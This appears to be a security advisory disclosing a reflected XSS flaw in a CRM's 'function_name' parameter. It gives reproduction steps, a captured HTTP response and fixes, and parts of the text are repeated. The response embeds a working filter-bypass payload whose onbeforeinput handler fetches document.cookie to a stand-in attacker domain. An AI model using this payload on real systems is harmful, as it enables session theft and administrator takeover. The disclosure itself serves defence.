You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A registered user in the system can execute arbitrary JavaScript code and thus, achieve a reflected Cross-site Scripting (XSS) attack. This can result, for example, in stealing targeted users' session cookies (including admins) or redirecting them to download arbitrary files controlled by the attacker.
Steps to Reproduce
Log in to the system as a regular user.
Familiarize yourself with the HTTP requests and notice the error message returned from the "ESListViewController" action when an incorrect function name is inserted via the "function_name" parameter.
Notice that when inserting HTML code into the "function_name" parameter value, several tags and events are escaped by the server, preventing the injection of arbitrary client-side code.
Observe that when inserting specific tags, such as or
, in conjunction with double less-than signs (<<) at the end, the HTML code is rendered successfully.
Notice that some events, such as "onbeforeinput," are rendered as well, allowing the construction of a successful XSS payload using arbitrary client-side code. This crafted payload is responsible for stealing the targeted user's session cookie upon accessing the URL and pressing any key.
The targeted user, who has the role of administrator, accesses the crafted URL, presses any key, and the session cookie is transferred to an attacker-controlled website automatically, without the admin's knowledge.
The attacker gains complete access to the administrator account and performs further actions on the system, such as creating a new administrator account for persistent access and extracting sensitive information about the company.
Disclaimer
Although the exploitation requires user interaction, attackers can easily manipulate this. The severe consequences (such as session hijacking) occur without the victim's knowledge, making this attack vector highly viable. For example, an attacker can create a convincing form that tricks the victim into entering arbitrary characters. Since the URL appears legitimate and only a single character/action is needed for a successful attack, it is highly likely to succeed.
HTTP/1.1 200 OK
Date: Fri, 17 May 2024 10:16:35 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: ck_login_id_20=3b1edca5-cac6-e6d8-5fdb-663f40272a6d; expires=Thu, 15-Aug-2024 10:16:35 GMT; Max-Age=7776000; path=/; domain=192.168.146.150; HttpOnly
Set-Cookie: ck_login_language_20=en_us; expires=Thu, 15-Aug-2024 10:16:35 GMT; Max-Age=7776000; path=/; domain=192.168.146.150; HttpOnly
Set-Cookie: sugar_user_theme=SuiteP; expires=Sat, 17-May-2025 10:16:35 GMT; Max-Age=31536000; path=/; domain=192.168.146.150; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Content-Encoding-Over-Network: gzip
Content-Length: 203
Class does not have function: ESListViewController-><div id="xss" contenteditable onbeforeinput="fetch('http://attacker-controlled-domain.test/?c='+document['cookie']);" autofocus>"<"<
PoC-alert.mp4PoC-stealing-cookies.mp4
Impact
Gain complete access to the system with an administrator account or any other user of the attacker's choice.
Recommendations
Ensure that user-generated content undergoes HTML encoding before display, which neutralizes any potentially harmful scripts.
Use the HttpOnly attribute for cookies, which prevents client-side scripts from accessing them, thereby preventing XSS attacks targeting session data theft or manipulation.
Implement Content Security Policies (CSPs), which define approved sources for content loading, limiting the execution of malicious scripts injected by attackers.
Description
A registered user in the system can execute arbitrary JavaScript code and thus, achieve a reflected Cross-site Scripting (XSS) attack. This can result, for example, in stealing targeted users' session cookies (including admins) or redirecting them to download arbitrary files controlled by the attacker.
Steps to Reproduce
Disclaimer
Although the exploitation requires user interaction, attackers can easily manipulate this. The severe consequences (such as session hijacking) occur without the victim's knowledge, making this attack vector highly viable. For example, an attacker can create a convincing form that tricks the victim into entering arbitrary characters. Since the URL appears legitimate and only a single character/action is needed for a successful attack, it is highly likely to succeed.
Proof of Concept Request and Response
Request:
Response:
PoC-alert.mp4
PoC-stealing-cookies.mp4
Impact
Gain complete access to the system with an administrator account or any other user of the attacker's choice.
Recommendations
References
https://cwe.mitre.org/data/definitions/79.html
https://portswigger.net/web-security/cross-site-scripting
The text was updated successfully, but these errors were encountered: